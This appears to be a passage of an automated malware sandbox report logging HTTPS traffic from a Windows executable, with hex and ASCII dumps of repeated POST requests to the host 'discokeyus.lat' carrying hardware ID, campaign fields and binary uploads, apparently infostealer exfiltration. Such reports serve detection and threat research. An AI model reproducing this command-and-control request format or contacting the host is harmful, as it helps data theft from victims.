                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 66 4d 4d 65 68 45 30 64 6f 30 2f 57 62 72 2f 62 4b 47 53 6f 64 74 32 32 4a 51 39 4d 32 76 4d 48 47 4f 78 72 77 6a 79 6f 6d 39 2f 59 4e 70 71 78 2f 72 33 53 2f 6a 66 4f 6e 6a 76 73 46 64 77 48 4f 55 59 6c 53 79 6d 75 78 34 4d 38 44 45 70 32 79 56 79 4a 33 2f 6a 32 71 38 47 76 4b 5a 4f 71 4a 71 70 75 71 34 68 67 32 4a 63 70 56 6b 55 62 53 48 35 7a 4e 32 68 64 47 30 4a 63 43 46 76 65 4b 47 5a 71 73 58 35 4e 4d 76 34 33 6e 69 34 4c 6e 41 56 63 6b 30 31 53 56 62 72 4e 57 33 65 46 36 46 30 37 67 67 32 38 71 48 72 35 4d 6e 73 56 66 6b 31 57 57 30 4d 2b 37 6f 74 38 56 65 78 6e 65 54 62 6b 36 30 68 2b 6b 31 65 4a 4c 46 75 69 4c 48 69 36 2f 6c 67 6d 2b 72 48 75 6a 51 49 4f 74 33 70 71 50 30 77 55 32 4a 4c 4e 74 45 55 62 2b 5a 35 53 39 39 77 4e 7a 78 4e 59 32 50 73
                                                                                                                                            Data Ascii: fMMehE0do0/Wbr/bKGSodt22JQ9M2vMHGOxrwjyom9/YNpqx/r3S/jfOnjvsFdwHOUYlSymux4M8DEp2yVyJ3/j2q8GvKZOqJqpuq4hg2JcpVkUbSH5zN2hdG0JcCFveKGZqsX5NMv43ni4LnAVck01SVbrNW3eF6F07gg28qHr5MnsVfk1WW0M+7ot8VexneTbk60h+k1eJLFuiLHi6/lgm+rHujQIOt3pqP0wU2JLNtEUb+Z5S99wNzxNY2Ps
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 6e 47 75 2b 5a 61 36 78 30 2f 71 33 73 68 6e 2f 4b 59 4a 68 76 48 6f 47 57 34 54 5a 36 6c 6f 4f 67 59 74 54 49 75 75 50 4d 4d 65 67 61 34 74 45 6a 2f 6e 7a 72 37 72 72 49 57 73 78 37 6b 32 56 63 75 5a 44 72 4d 33 61 44 7a 72 73 2b 78 34 69 31 36 6f 31 6a 6f 6c 65 74 6d 53 4c 30 4d 37 36 74 68 64 46 65 69 30 47 59 61 31 4b 7a 67 36 38 6e 4d 35 6d 44 75 43 43 4e 30 50 33 69 68 47 79 74 47 4f 4c 54 4b 2b 6c 35 36 75 57 36 78 55 66 47 63 4a 74 70 56 4c 36 59 34 54 78 31 69 63 69 30 4b 73 32 4a 74 36 2f 43 4b 61 38 50 6f 34 46 6c 32 48 54 71 34 4c 75 45 59 4d 70 36 6c 57 4a 4b 39 49 71 68 49 54 32 48 7a 2f 39 30 6a 59 53 30 37 34 64 6a 72 42 66 6b 31 43 44 76 64 4f 58 67 73 38 78 62 7a 6e 43 58 62 46 47 79 6c 65 67 38 65 4a 4c 47 74 69 44 42 79 50 4f 76 69 33
                                                                                                                                            Data Ascii: nGu+Za6x0/q3shn/KYJhvHoGW4TZ6loOgYtTIuuPMMega4tEj/nzr7rrIWsx7k2VcuZDrM3aDzrs+x4i16o1joletmSL0M76thdFei0GYa1Kzg68nM5mDuCCN0P3ihGytGOLTK+l56uW6xUfGcJtpVL6Y4Tx1ici0Ks2Jt6/CKa8Po4Fl2HTq4LuEYMp6lWJK9IqhIT2Hz/90jYS074djrBfk1CDvdOXgs8xbznCXbFGyleg8eJLGtiDByPOvi3
                                                                                                                                            2024-12-20 16:24:46 UTC183INData Raw: 6d 53 4c 67 4d 37 36 74 76 63 39 48 78 33 71 53 61 46 71 38 6b 75 45 31 64 6f 62 49 75 43 76 4c 68 62 58 69 69 57 71 70 45 2b 6e 4c 4a 75 64 35 36 2b 66 30 69 42 58 4f 62 4e 73 39 48 4a 4f 5a 78 69 68 6d 6b 74 58 2f 4d 34 4f 52 2f 65 69 41 4b 66 42 58 34 4e 59 73 34 33 76 75 34 72 76 43 57 38 39 79 6c 6d 42 54 76 6f 66 6e 4e 6e 43 4c 7a 4c 51 2b 7a 59 57 35 34 34 68 68 6f 78 32 6a 6c 32 58 72 61 36 61 31 39 50 4e 59 78 6e 53 59 63 78 79 72 32 2f 5a 34 65 6f 79 44 35 32 7a 42 68 72 33 67 67 47 57 6a 48 2b 4c 56 4b 2b 74 32 37 2b 57 38 31 0d 0a
                                                                                                                                            Data Ascii: mSLgM76tvc9Hx3qSaFq8kuE1dobIuCvLhbXiiWqpE+nLJud56+f0iBXObNs9HJOZxihmktX/M4OR/eiAKfBX4NYs43vu4rvCW89ylmBTvofnNnCLzLQ+zYW544hhox2jl2Xra6a19PNYxnSYcxyr2/Z4eoyD52zBhr3ggGWjH+LVK+t27+W81
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 33 63 63 37 0d 0a 46 54 4e 66 4a 70 72 55 37 57 52 36 6a 31 35 68 38 65 35 49 34 33 47 2f 65 69 55 4b 66 42 58 7a 50 34 51 72 6c 4c 63 72 61 75 49 54 49 6c 7a 6c 79 55 45 39 4a 6e 73 4e 48 57 50 78 62 59 67 78 34 47 32 34 34 64 74 70 42 37 6d 33 79 54 70 64 75 66 70 75 4d 78 54 79 6e 65 55 61 6c 4f 38 31 61 46 34 65 70 69 44 35 32 7a 6f 6e 37 62 68 69 69 6d 33 57 66 71 5a 49 75 41 7a 76 71 32 34 7a 31 50 50 63 5a 64 6b 57 72 79 51 35 7a 78 38 68 73 57 38 49 38 6d 4e 76 4f 43 49 5a 61 59 64 34 74 67 70 35 33 7a 74 36 50 53 49 46 63 35 73 32 7a 30 63 68 5a 62 35 4c 32 32 4d 67 36 42 69 31 4d 69 36 34 38 77 78 36 42 62 78 30 79 2f 69 64 75 6e 6f 74 38 6c 53 78 48 4b 58 62 31 57 38 6b 2b 41 78 62 34 50 50 73 53 76 44 68 4c 50 69 68 6d 71 6c 56 36 32 5a 49 76
                                                                                                                                            Data Ascii: 3cc7FTNfJprU7WR6j15h8e5I43G/eiUKfBXzP4QrlLcrauITIlzlyUE9JnsNHWPxbYgx4G244dtpB7m3yTpdufpuMxTyneUalO81aF4epiD52zon7bhiim3WfqZIuAzvq24z1PPcZdkWryQ5zx8hsW8I8mNvOCIZaYd4tgp53zt6PSIFc5s2z0chZb5L22Mg6Bi1Mi648wx6Bbx0y/idunot8lSxHKXb1W8k+Axb4PPsSvDhLPihmqlV62ZIv
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 76 4d 31 61 7a 32 61 58 61 30 36 78 68 2f 31 34 4d 38 44 45 70 32 79 56 79 49 76 6f 6e 48 6d 72 56 64 4c 50 4a 76 70 34 36 2b 48 30 32 52 76 51 4e 4a 78 70 48 4f 7a 56 36 54 64 30 67 38 79 2b 4a 63 47 46 75 4f 61 4a 61 4b 34 54 36 64 4d 6c 36 6e 58 6e 36 4c 37 46 56 4d 4e 39 6e 47 31 62 74 34 65 76 64 6a 32 48 32 2f 39 30 6a 61 47 36 2f 59 4a 35 36 41 69 74 77 47 58 72 66 36 61 31 39 4d 4a 66 78 6e 43 63 61 56 71 78 6b 2b 49 35 63 6f 48 44 73 43 6a 47 67 62 76 75 67 57 79 6c 45 2f 48 54 4c 75 4e 2f 37 2b 47 35 68 68 75 4a 63 34 4d 6c 42 50 53 6b 34 6a 5a 7a 68 39 58 2f 4d 34 4f 52 2f 65 69 41 4b 66 42 58 34 74 55 71 37 33 7a 6c 37 72 58 4d 52 39 74 34 6b 6d 31 5a 75 4a 37 68 50 6d 2b 47 7a 4c 59 76 7a 6f 47 36 35 34 42 6a 71 78 43 6a 6c 32 58 72 61 36 61
                                                                                                                                            Data Ascii: vM1az2aXa06xh/14M8DEp2yVyIvonHmrVdLPJvp46+H02RvQNJxpHOzV6Td0g8y+JcGFuOaJaK4T6dMl6nXn6L7FVMN9nG1bt4evdj2H2/90jaG6/YJ56AitwGXrf6a19MJfxnCcaVqxk+I5coHDsCjGgbvugWylE/HTLuN/7+G5hhuJc4MlBPSk4jZzh9X/M4OR/eiAKfBX4tUq73zl7rXMR9t4km1ZuJ7hPm+GzLYvzoG654BjqxCjl2Xra6a
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 39 41 30 6e 47 6b 63 37 4e 58 70 4d 58 75 48 78 62 45 2b 79 49 36 79 34 49 56 67 72 42 2f 67 32 53 48 6f 64 4f 50 75 75 4d 31 53 79 6e 75 66 62 46 4b 39 6d 71 39 32 50 59 66 62 2f 33 53 4e 71 61 62 73 67 47 54 6f 43 4b 33 41 5a 65 74 2f 70 72 58 30 79 6c 76 4d 64 4a 46 6a 57 4c 47 54 35 54 31 39 69 38 43 77 4b 4d 75 4d 73 75 2b 48 59 4b 6b 52 35 74 4d 75 36 6e 37 6c 36 37 4b 47 47 34 6c 7a 67 79 55 45 39 4c 58 30 4e 58 47 48 67 36 42 69 31 4d 69 36 34 38 77 78 36 42 7a 76 33 53 4c 73 66 75 58 6c 73 63 4a 66 7a 48 53 54 64 31 53 30 6b 76 30 71 66 59 6e 47 73 79 2f 4e 6a 4c 76 6d 69 6d 71 73 56 36 32 5a 49 76 51 7a 76 71 32 5a 79 6c 4c 67 63 34 41 6c 51 2f 71 4d 72 7a 39 78 77 4a 76 2f 4c 63 61 43 73 75 4b 50 62 36 73 63 35 74 4d 6b 36 33 76 72 2f 37 66 4a
                                                                                                                                            Data Ascii: 9A0nGkc7NXpMXuHxbE+yI6y4IVgrB/g2SHodOPuuM1SynufbFK9mq92PYfb/3SNqabsgGToCK3AZet/prX0ylvMdJFjWLGT5T19i8CwKMuMsu+HYKkR5tMu6n7l67KGG4lzgyUE9LX0NXGHg6Bi1Mi648wx6Bzv3SLsfuXlscJfzHSTd1S0kv0qfYnGsy/NjLvmimqsV62ZIvQzvq2ZylLgc4AlQ/qMrz9xwJv/LcaCsuKPb6sc5tMk63vr/7fJ
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 6b 6c 42 50 54 53 37 43 70 76 68 73 43 70 4c 34 71 32 67 38 69 61 59 36 38 48 35 4d 34 71 72 44 32 6d 34 76 53 65 62 49 6c 39 6e 48 35 4e 6f 70 6a 2f 50 7a 32 2f 6a 66 38 30 6a 64 44 39 32 6f 39 6e 70 68 44 31 79 47 6a 4c 5a 65 7a 71 70 4d 46 43 78 6a 54 56 4a 56 72 30 7a 62 78 32 50 59 54 53 2f 33 53 64 32 75 61 36 33 7a 37 34 52 66 79 58 50 4b 78 6c 70 72 58 6d 69 42 58 62 4e 4d 4d 6c 47 37 65 48 2f 54 35 2b 6c 73 44 34 45 76 4f 76 70 2b 4b 4b 66 72 6b 70 33 64 34 2f 34 58 58 78 2f 50 6a 54 56 73 64 36 6e 48 4d 63 2b 74 58 67 65 43 57 35 67 2f 64 73 38 73 62 39 39 38 77 78 36 43 4c 67 31 79 76 72 5a 66 65 67 6b 39 78 59 7a 32 4f 4b 4a 52 4c 30 6b 36 39 67 4c 63 36 44 75 7a 32 4e 30 4f 32 39 31 7a 7a 37 51 4c 4f 4c 4f 71 4a 71 70 76 76 30 6e 67 65 48 4e
                                                                                                                                            Data Ascii: klBPTS7CpvhsCpL4q2g8iaY68H5M4qrD2m4vSebIl9nH5Nopj/Pz2/jf80jdD92o9nphD1yGjLZezqpMFCxjTVJVr0zbx2PYTS/3Sd2ua63z74RfyXPKxlprXmiBXbNMMlG7eH/T5+lsD4EvOvp+KKfrkp3d4/4XXx/PjTVsd6nHMc+tXgeCW5g/ds8sb998wx6CLg1yvrZfegk9xYz2OKJRL0k69gLc6Duz2N0O291zz7QLOLOqJqpvv0ngeHN
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 30 6d 71 39 67 52 4d 43 4c 2f 78 4f 44 79 4b 57 76 31 43 6d 64 46 4f 33 58 49 76 70 69 71 38 71 36 77 56 54 66 5a 49 78 71 48 50 72 56 36 58 67 6c 30 6f 33 2f 4b 4e 7a 49 35 62 2f 65 4d 76 31 45 74 49 6c 33 38 7a 33 2f 72 61 4b 47 44 5a 73 36 32 33 63 63 37 4e 57 6f 4f 32 2b 53 78 62 77 36 7a 73 2b 44 30 61 74 6e 72 78 62 31 79 54 4c 6a 50 4d 6a 62 6c 66 68 72 33 48 65 56 61 31 75 69 68 4b 39 32 50 59 2b 44 35 78 57 4e 77 50 33 51 77 69 6d 77 56 37 75 5a 45 4f 39 39 36 4f 71 69 31 78 6a 75 65 70 78 6b 53 71 53 43 34 48 64 54 74 75 4c 2f 59 6f 32 4f 2f 62 66 65 4a 2b 67 54 38 70 6c 39 76 43 47 39 75 4f 65 52 42 5a 74 72 31 58 77 63 6f 74 57 33 61 6a 50 41 30 66 39 30 6a 63 2b 2b 2f 5a 35 76 71 77 48 67 6e 68 76 53 56 4f 6a 71 74 64 42 46 78 48 69 36 5a 6b
                                                                                                                                            Data Ascii: 0mq9gRMCL/xODyKWv1CmdFO3XIvpiq8q6wVTfZIxqHPrV6Xgl0o3/KNzI5b/eMv1EtIl38z3/raKGDZs623cc7NWoO2+Sxbw6zs+D0atnrxb1yTLjPMjblfhr3HeVa1uihK92PY+D5xWNwP3QwimwV7uZEO996Oqi1xjuepxkSqSC4HdTtuL/Yo2O/bfeJ+gT8pl9vCG9uOeRBZtr1XwcotW3ajPA0f90jc++/Z5vqwHgnhvSVOjqtdBFxHi6Zk


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.549724104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:48 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=0BYKMF78EM1G5TZVS53
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 12841
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:48 UTC12841OUTData Raw: 2d 2d 30 42 59 4b 4d 46 37 38 45 4d 31 47 35 54 5a 56 53 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 42 59 4b 4d 46 37 38 45 4d 31 47 35 54 5a 56 53 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 42 59 4b 4d 46 37 38 45 4d 31 47 35 54 5a 56 53 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                            Data Ascii: --0BYKMF78EM1G5TZVS53Content-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--0BYKMF78EM1G5TZVS53Content-Disposition: form-data; name="pid"2--0BYKMF78EM1G5TZVS53Content-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                            2024-12-20 16:24:49 UTC1128INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:49 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=clb53fat419t0sqm5846jdpcrp; expires=Tue, 15 Apr 2025 10:11:28 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2WbtEwfCFURSXRFN9oAZ6oepANFRiY8eqBb8dLOlX6WT1PEUA1p6Peci%2B1uLfcK34j3yTIFw92wYSwlNS1ggxNnCtqVMLrFHZbmAhKmD%2F%2BxLxoSs8L9VbOuCaHrCUrGzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc194a348cc6-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1827&rtt_var=688&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13780&delivery_rate=1586094&cwnd=222&unsent_bytes=0&cid=9eff07af971e84ce&ts=918&x=0"
                                                                                                                                            2024-12-20 16:24:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-20 16:24:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.549727104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:51 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=IT89N01QY0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 15029
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:51 UTC15029OUTData Raw: 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                            Data Ascii: --IT89N01QY0Content-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--IT89N01QY0Content-Disposition: form-data; name="pid"2--IT89N01QY0Content-Disposition: form-data; name="lid"PsFKDg--pablo--IT89N01QY0Content-
                                                                                                                                            2024-12-20 16:24:52 UTC1132INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:52 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=h280ieae9m9n8m5pqd6a3220an; expires=Tue, 15 Apr 2025 10:11:30 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wjU6lXlpjLNkAco2f%2F2LHjj4Bmw%2BKyUUllg8uuzj%2FO88fN9EH9jeDyDI0KWsFRNdmRFQsYIunP1hlTLMUAjPWmq9dzQMDvo1tRpMdZw9vvxmKXP%2BtboK11xpcOxETuiqfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc29bc1d7c8d-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2046&rtt_var=780&sent=14&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15959&delivery_rate=1390476&cwnd=185&unsent_bytes=0&cid=9a6927bb930d114a&ts=1141&x=0"
                                                                                                                                            2024-12-20 16:24:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-20 16:24:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.549728104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:53 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=YDADZDCTSSFX6QBKKQ
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20567
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:53 UTC15331OUTData Raw: 2d 2d 59 44 41 44 5a 44 43 54 53 53 46 58 36 51 42 4b 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 44 41 44 5a 44 43 54 53 53 46 58 36 51 42 4b 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 44 41 44 5a 44 43 54 53 53 46 58 36 51 42 4b 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                            Data Ascii: --YDADZDCTSSFX6QBKKQContent-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--YDADZDCTSSFX6QBKKQContent-Disposition: form-data; name="pid"3--YDADZDCTSSFX6QBKKQContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                            2024-12-20 16:24:53 UTC5236OUTData Raw: 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                            2024-12-20 16:24:54 UTC1129INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:54 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=k4vb5g979npq2j8jdmlpouhi58; expires=Tue, 15 Apr 2025 10:11:33 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lSoeRlNHAI58wKSCxJx27BDY4F4m57qqCgvsppSsEiiDQ3Hvfz3F4dg0pa64RSVP4RWga6TR%2FrNkEzJJ1QdCd1pluKkzGw5KgCK0HtF3FinLoc3mdAj%2F%2BKfVg5naz6yR8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc392a73422f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1570&rtt_var=629&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21527&delivery_rate=1684939&cwnd=137&unsent_bytes=0&cid=d795a9e5c873f6bc&ts=985&x=0"
                                                                                                                                            2024-12-20 16:24:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-20 16:24:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.549731104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:56 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=YEI62A1UWSBO
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1220
                                                                                                                                            Host: discokeyus.lat
